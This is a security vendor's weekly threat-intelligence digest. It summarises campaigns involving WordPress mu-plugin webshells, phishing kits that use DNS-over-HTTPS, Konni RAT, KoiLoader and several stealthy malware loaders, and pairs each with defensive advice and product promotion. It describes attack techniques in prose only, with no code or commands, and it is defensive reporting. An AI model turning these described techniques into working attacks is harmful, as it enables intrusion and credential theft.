Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
Hackers Abuse WordPress MU-Plugins to Hide Malicious Code
(TLP: CLEAR) Hackers are exploiting the WordPress Must-Use Plugins (mu-plugins) directory to execute malicious code on every page load while avoiding detection. This technique was first identified by Sucuri researchers in February 2025 and has been increasingly adopted by threat actors deploying three distinct payloads. The first payload, redirect.php, redirects visitors—excluding bots and logged-in admins—to a malicious website (updatesnow[.]net) that displays a fake browser update prompt designed to trick users into downloading malware. The second payload, index.php, is a webshell acting as a backdoor that fetches and executes PHP code from a GitHub repository, enabling attackers to remotely execute commands on the server, steal data, and initiate further attacks. The third payload, custom-js-loader.php, replaces all images on the site with explicit content and hijacks outbound links, redirecting users to popups and other shady content. The exploitation of mu-plugins is particularly effective because these plugins automatically execute on every page load without needing activation through the admin dashboard. Additionally, they are stored in the ‘wp-content/mu-plugins/’ directory and are not listed in the standard WordPress plugin interface unless the “Must-Use” filter is explicitly applied. This makes them an attractive target for attackers aiming for persistence and stealth. While mu-plugins have legitimate use cases, such as enforcing custom security rules or improving performance, their inherent design makes them prone to abuse. The discovered payloads are financially motivated and harmful to compromised sites. Beyond damaging a site’s reputation and SEO, the payloads attempt to install malware on visitors’ systems and provide attackers with the ability to conduct downstream attacks. The webshell backdoor is particularly dangerous due to its capacity for remote command execution and data theft. Although the exact infection vector remains unclear, Sucuri suspects attackers are exploiting known vulnerabilities in plugins, themes, or weak admin credentials. To mitigate these threats, WordPress administrators are advised to apply security updates to plugins and themes, remove or disable unnecessary plugins, and secure privileged accounts with strong passwords and multi-factor authentication.
(TLP: CLEAR) Comments: The exploitation of WordPress’s Must-Use Plugins (mu-plugins) directory highlights malicious actors’ growing sophistication in leveraging under-monitored components for persistence. Mu-plugins are designed for essential site-wide functionality, running on every page load without activation, making them ideal for malicious actors seeking stealth. Their ability to execute before standard plugins makes them a prime target for establishing a foothold, even when security measures are in place. The use of diverse payloads, including redirections, webshell backdoors, and JavaScript hijacking, suggests a financially motivated operation aimed at credential theft, malware distribution, and SEO manipulation. This technique also resembles broader trends in CMS targeting, where malicious actors exploit inherent functionalities for persistence and monetization. As WordPress powers over 40% of all websites, malicious actors are likely experimenting with mu-plugins as a reliable compromise method. Defensively, traditional WordPress security plugins may not detect malicious mu-plugins unless specifically configured. Improving visibility through file integrity monitoring, enhanced logging, and manual reviews of the ‘wp-content/mu-plugins/’ directory is essential. This campaign underscores the need for administrators to be aware of unconventional attack vectors and enhance monitoring practices accordingly.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 6.4.1: “For public-facing web applications, new threats and vulnerabilities are addressed on an ongoing basis and these applications are protected against known attacks as follows:
- “Reviewing public-facing web applications via manual or automated application vulnerability security assessment tools or methods as follows:
- By an entity that specializes in application security. – Including, at a minimum, all common software attacks in Requirement 6.2.4.
- All vulnerabilities are ranked in accordance with requirement 6.3.1.
- All vulnerabilities are corrected.
- The application is re-evaluated after the corrections
OR
- Installing an automated technical solution(s) that continually detects and prevents web-based attacks as follows:
- Installed in front of public-facing web applications to detect and prevent web-based attacks. – Actively running and up to date as applicable.
- Generating audit logs.
- Configured to either block web-based attacks or generate an alert that is immediately investigated.”
(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, can augment the effectiveness of your existing on-prem WAF investment by filtering out bad traffic from the public cloud before it reaches your network so you can reduce the overall traffic load on your on-prem devices.
Source: https://www.bleepingcomputer.com/news/security/hackers-abuse-wordpress-mu-plugins-to-hide-malicious-code/
Phishing-as-a-Service Operation Uses DNS-over-HTTPS for Evasion
(TLP: CLEAR) Morphing Meerkat is a sophisticated phishing-as-a-service (PhaaS) operation that has been active since at least 2020, employing advanced techniques such as DNS over HTTPS (DoH) and DNS MX record queries to evade detection. Discovered by researchers at Infoblox, the operation leverages a centralized SMTP infrastructure to distribute phishing emails impersonating over 114 brands, including Gmail, Outlook, DHL, and Maersk. Messages are crafted to prompt urgent action, often delivered in multiple languages to broaden the attack surface. The phishing process begins with the victim clicking a malicious link in a spoofed email, which redirects them through compromised ad tech platforms like Google DoubleClick. Using DoH via Google or Cloudflare, the phishing kit queries the victim’s email domain’s MX record to identify the email provider. Based on this information, a dynamically generated spoofed login page is displayed, pre-filled with the victim’s email address to enhance credibility. Credentials entered by the victim are exfiltrated to malicious actors via AJAX requests or Telegram bot webhooks, with an error message prompting re-entry to ensure accuracy. Finally, victims are redirected to legitimate authentication pages to reduce suspicion. Infoblox recommends enhanced DNS control to mitigate the threat, including blocking user access to unauthorized DoH servers and restricting access to non-critical infrastructure.
(TLP: CLEAR) Comments: Morphing Meerkat’s use of DNS over HTTPS (DoH) and DNS MX record queries reflects a sophisticated approach by malicious actors to enhance phishing success and evade detection. By encrypting DNS queries via HTTPS, DoH bypasses traditional DNS monitoring systems, complicating detection efforts. Leveraging DNS MX record queries allows attackers to dynamically generate spoofed login pages tailored to the victim’s email provider, enhancing credibility and capture rates. The use of real-time credential forwarding via Telegram bots ensures rapid exploitation or resale of stolen credentials. The operation’s longevity since 2020 indicates its success in evading detection, likely due to exploiting under secured platforms and leveraging compromised WordPress sites for redirection. Its multilingual phishing emails suggest a global targeting strategy and possible collaboration among multiple malicious actors. Defensive measures relying solely on conventional DNS monitoring will likely fail against these tactics. Effective mitigation requires inspecting HTTPS traffic for anomalous DNS queries, applying stricter controls over DoH, and blocking unauthorized access to commonly exploited ad tech platforms. Morphing Meerkat highlights the adaptability of malicious actors, underscoring the need for organizations to refine detection techniques and enhance monitoring systems to combat such evolving threats.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Detection Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware, phishing, and other abuses:
- The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.
- The Categories Engine uses Vercara-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click.
- The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.
- The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.
Konni RAT Exploit Windows Explorer to Launches a Multi-Stage Attack in Windows
(TLP: CLEAR) The Konni Remote Access Trojan (RAT), linked to North Korean malicious actors, has evolved to exploit Windows Explorer vulnerabilities, allowing multi-stage attacks with enhanced stealth. Discovered by Cyfirma researchers during a targeted campaign against diplomatic entities in Southeast Asia, the malware leverages Windows Explorer’s file handling processes to establish persistence and execute malicious code undetected. The infection begins with spear-phishing emails containing malicious document attachments that trigger a DLL search order hijacking vulnerability. The malware places a malicious DLL where Windows Explorer loads it instead of the legitimate system file, exploiting the trusted process’s elevated privileges. Once established, the malware modifies the Windows Registry for persistence and injects code into legitimate processes to maintain control and evade detection. Konni RAT employs fileless techniques, living-off-the-land binaries (LOLBins), and encrypted command-and-control communications mimicking HTTPS traffic to obfuscate its activity. This evolution signifies a significant advancement in malware techniques, enabling malicious actors to maintain long-term access, escalate privileges, and exfiltrate sensitive data. Organizations, particularly in government, defense, and critical infrastructure sectors, are urged to implement strict application control policies, monitor for suspicious DLL loading, and deploy behavioral detection systems to identify such sophisticated exploitation attempts.
(TLP: CLEAR) Comments: The latest evolution of Konni RAT demonstrates how malicious actors are exploiting Windows Explorer’s trusted processes to enhance stealth and persistence. By leveraging DLL search order hijacking, attackers achieve privilege escalation and evade detection by signature-based antivirus solutions. This technique reflects a broader shift toward fileless malware and living-off-the-land binaries (LOLBins), exploiting built-in Windows functionalities to remain undetected. Konni RAT’s use of spear-phishing to target high-value entities aligns with tactics commonly used by advanced persistent threats (APTs). Exploiting Windows Explorer allows attackers to bypass application whitelisting and endpoint detection systems by manipulating legitimate processes. Additionally, encrypted command-and-control communications mimicking HTTPS traffic make network-based detection challenging. The malware’s persistence mechanisms, including registry modifications and scheduled tasks, ensure long-term access and resilience against system reboots. The targeted nature of these attacks indicates that malicious actors are conducting reconnaissance to tailor their campaigns effectively. The ongoing evolution of Konni RAT underscores the need for organizations to implement behavioral detection systems capable of identifying abnormal DLL loading patterns and monitoring for unauthorized registry modifications. Improving visibility into legitimate processes and enhancing anomaly detection are essential to mitigate these sophisticated threats.
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency #StopRansomware Guide: “Implement Protective Domain Name System (DNS). By blocking malicious internet activity at the source, Protective DNS services can provide high network security for remote workers. These security services analyze DNS queries and take action to mitigate threats—such as malware, ransomware, phishing attacks, viruses, malicious sites, and spyware—leveraging the existing DNS protocol and architecture.”
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.
Source: https://cybersecuritynews.com/konni-rat-exploit-windows-explorer/
New KoiLoader Abuses Powershell Scripts to Deliver Malicious Payload
(TLP: CLEAR) A new KoiLoader variant is leveraging PowerShell scripts embedded within malicious Windows shortcut (LNK) files to evade detection and distribute information-stealing malware like Koi Stealer. Discovered by eSentire, this campaign employs phishing emails impersonating financial institutions to deliver ZIP archives containing LNK files that exploit a Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments. Once executed, the LNK file triggers a PowerShell command to download two JScript payloads, establishing persistence through scheduled tasks and executing further malicious activities. The malware uses techniques like process parentage alteration to disguise its presence, making detection by traditional endpoint security tools challenging. KoiLoader serves as a delivery mechanism for Koi Stealer, which exfiltrates credentials, cryptocurrency wallets, and sensitive data through encrypted HTTP POST requests. The malware also employs advanced obfuscation techniques, including API hashing and reflective code injection, to bypass security tools. This campaign highlights an evolving trend where malicious actors increasingly exploit living-off-the-land binaries (LOLBins) and obfuscated scripting to circumvent traditional detection mechanisms. Researchers recommend disabling wscript.exe via AppLocker, monitoring PowerShell logs, and deploying behavior-based detection solutions to combat such threats.
(TLP: CLEAR) Comments: The latest KoiLoader variant demonstrates how malicious actors exploit living-off-the-land binaries (LOLBins) and obfuscation techniques to evade detection. By embedding PowerShell commands in LNK files and exploiting the Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, attackers bypass traditional security mechanisms focused on executable files. This technique’s stealthiness is enhanced by modifying process parentage and using scheduled tasks for persistence, mimicking legitimate system activity to avoid detection by endpoint detection and response (EDR) solutions. Leveraging API hashing and reflective code injection further complicates detection, as these methods are designed to evade both signature-based tools and static analysis. Encrypted HTTP POST requests for data exfiltration are another attempt to blend malicious activity with legitimate traffic, reducing the effectiveness of network-based monitoring. The deployment of Koi Stealer to harvest credentials, cryptocurrency wallets, and sensitive documents suggests a financially motivated campaign. Effective mitigation requires behavioral analysis rather than relying on signature detection. Disabling wscript.exe via AppLocker, monitoring PowerShell execution logs, and using EDR solutions capable of detecting anomalous script activity are critical steps to combat this evolving threat.
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency #StopRansomware Guide: “Implement Protective Domain Name System (DNS). By blocking malicious internet activity at the source, Protective DNS services can provide high network security for remote workers. These security services analyze DNS queries and take action to mitigate threats—such as malware, ransomware, phishing attacks, viruses, malicious sites, and spyware—leveraging the existing DNS protocol and architecture.”
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.
Source: https://cybersecuritynews.com/new-koiloader-abuses-powershell-scripts/
New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth
(TLP: CLEAR) Hijack Loader, a malware loader first discovered in 2023, has evolved to include sophisticated evasion techniques like call stack spoofing and anti-VM checks to avoid detection and maintain persistence. The latest version also leverages the Heaven’s Gate technique for process injection and blocks specific antivirus processes such as Avast. Researchers from Zscaler noted the malware’s ability to conceal API and system call origins using fabricated stack frames, complicating detection and analysis. Additionally, Elastic Security Labs identified a new malware family called SHELBY, which uses GitHub as a command-and-control (C2) platform. Through DLL side-loading, SHELBYLOADER initiates communication with GitHub to retrieve encryption keys and decrypt payloads without leaving detectable artifacts. It employs sandbox detection techniques and executes commands by interacting with private GitHub repositories via Personal Access Tokens (PAT), making detection more challenging. Another loader, Emmenhtal (aka PEAKLIGHT), is distributing SmokeLoader through phishing emails with payment-themed lures. Emmenhtal uses .NET Reactor for obfuscation, aligning with trends in malware protection and anti-analysis mechanisms. These developments demonstrate an increasing sophistication among malicious actors using evasion techniques, legitimate platforms like GitHub, and enhanced obfuscation tools to complicate detection and achieve persistence.
(TLP: CLEAR) Comments: The evolution of Hijack Loader, SHELBY, and Emmenhtal loaders demonstrates how malicious actors are enhancing tactics to evade detection. Hijack Loader’s adoption of call stack spoofing, which fabricates legitimate stack frames to hide malicious calls, complicates detection by signature-based and behavioral tools. Anti-VM checks further impede analysis by identifying and avoiding sandbox environments. SHELBY’s use of GitHub for command-and-control (C2) operations highlights the trend of exploiting legitimate platforms for malicious purposes. By embedding Personal Access Tokens (PAT) in binaries, SHELBY maintains persistence and facilitates seamless exfiltration. Leveraging GitHub’s infrastructure allows attackers to dynamically update payloads and retrieve command outputs, evading network anomaly detectors. Emmenhtal’s deployment of SmokeLoader using .NET Reactor obfuscation reflects an increasing reliance on commercial protection tools to hinder analysis. The adoption of Themida, Enigma Protector, and custom crypters further demonstrates a commitment to avoiding detection. These developments show a shift toward exploiting legitimate infrastructure, enhancing obfuscation, and using advanced evasion techniques. Effective defense strategies must focus on detecting behavioral anomalies, improving logging, and employing heuristic-based tools capable of identifying subtle deviations from normal operations.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them.
Source: https://thehackernews.com/2025/04/new-malware-loaders-use-call-stack.html